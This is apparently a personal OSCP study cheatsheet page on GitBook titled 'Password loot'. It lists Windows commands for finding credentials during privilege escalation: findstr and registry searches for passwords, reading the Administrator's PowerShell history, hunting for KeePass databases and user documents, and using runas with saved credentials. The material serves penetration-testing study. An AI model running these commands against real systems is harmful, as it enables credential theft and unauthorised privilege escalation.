Kashishtopi
  • whoami
    • Little bit more about me
  • OSCP Cheatsheet
    • Cheatsheet
      • Scanning
      • Ports
        • 80/443 - HTTP(s)
        • 139/445 - SMB
        • 21 - FTP
        • 53 - DNS
        • 22 - SSH
        • 389/636/3268 - LDAP
        • 161 - SNMP
        • 25 - SMTP
        • 3389 - RDP
        • 135/593 - RPC
        • 5985/5986 - Evil-winrm
        • 3306 - MYSQL
        • 1433 - MSSQL
      • Shells
        • TTY shells
      • File Transfers
      • Host Web Server
    • Attacks
      • WebShell
      • Password Cracking
        • Bruteforce
        • Hash Crack
        • Create Wordlist
      • File Uploads
        • HTML (.hta)
        • Macro
        • OLE
      • LFI / RFI
      • Shellshock
      • Github
      • SQLi
        • MYSQL
        • MSSQL
    • Linux PrivEsc
      • Automated
      • Methodology
      • Quick wins
      • Manual Enum
      • Kernel Exploits
      • SUID
      • Insecure File Perm
      • Password Loot
      • Restrict Shell Escape
      • Sudo
      • Docker
      • Cron Jobs
      • Device Drivers
      • Unmounted Drives
      • Capabilities
      • NFS Root Squashing
    • Windows PrivEsc
      • Kernel exploit
      • Manual
      • Quick Wins
      • Password loot
      • Run As
      • SE Privileges
      • Unquoted Service Path
      • Scheduled Tasks
      • AlwaysInstallElevated
      • Insecure File permission
      • Windows Subsystem
      • UAC Bypass
      • .ODT - Htdocs
      • Autoron
      • upnuphost
    • Active Directory
      • We got Users but no Pass?
      • Enumeration
      • Authentication
      • Pivoting
      • Lateral Movement
      • Hash Dumping
      • Persistence
Powered by GitBook
On this page

Was this helpful?

  1. OSCP Cheatsheet
  2. Windows PrivEsc

Password loot

Keep trying these commands one by one to see if you find anything juicy

findstr /si password *.txt *.ini *.config # Password in text files
cmdkey /list
type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt # password

# All 3 are golden Powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<steve>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

WE CAN ALWAYS SWITCH TO OTHER USER WITH RUNAS COMMAND like and put the password that we found
runas /user:backupadmin cmd # backupadmin is the user here
runas /savecred /user:admin cmd # We can try getting reverse shell install cmd

# Password in registry keys
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Look for desktop.ini on desktop of all users, you may find password sometimes CTFish
Look for unattended.xml files
Look at PowerShell history and appcmd.exe on winpeas
PreviousQuick WinsNextRun As

Last updated 1 year ago

Was this helpful?